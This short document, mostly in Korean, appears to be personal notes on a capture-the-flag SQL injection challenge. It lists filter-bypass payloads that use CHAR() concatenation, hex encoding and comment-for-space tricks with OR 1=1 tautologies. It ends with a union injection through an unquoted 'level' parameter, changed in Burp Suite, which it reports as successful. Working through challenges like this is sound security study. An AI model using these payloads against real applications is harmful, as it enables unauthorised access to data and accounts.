admin -> 16 -> 0x61646d696e -> x'61646d696e' -> ' 작은 따옴표 차단으로 사용 불가

admin -> CHAR(97)||CHAR(100)||CHAR(109)||CHAR(105)||CHAR(110)

' -> CHAR(39)

\ -> CHAR(92)

우회는 가능하나 flag 접근 불가

CHAR(97)||CHAR(100)||CHAR(109)||CHAR(105)||CHAR(110)/**/AND/**/level=9--	x

CHAR(97)||CHAR(100)||CHAR(109)||CHAR(105)||CHAR(110)/**/OR/**/1=1--

(CHAR(97)||CHAR(100)||CHAR(109)||CHAR(105)||CHAR(110))/**/||/**/level=9--	x

CHAR(97)||CHAR(100)||CHAR(109)||CHAR(105)||CHAR(110)||CHAR(39)/**/AND/**/level=9--	x

CHAR(97)||CHAR(100)||CHAR(109)||CHAR(105)||CHAR(110)||CHAR(39)/**/AND/**/level=9/**/OR/**/1=1--

\'uid='admin' or 1=1-- -> CHAR(92)||CHAR(39)/**/uid=CHAR(39)||CHAR(97)||CHAR(100)||CHAR(109)||CHAR(105)||CHAR(110)||CHAR(39)/**/OR/**/1=1--

burfsuit 사용

파라미터 값 수정

uid={}&upw={}
형식으로 넘어감

query에 level값을 이용해서 수정

uid={아무 값}&upw={아무 값}&level=1/**/union/**/value(CHAR(97)||CHAR(100)||CHAR(109)||CHAR(105)||CHAR(110))

level 자체에 ''가 없어서 성공

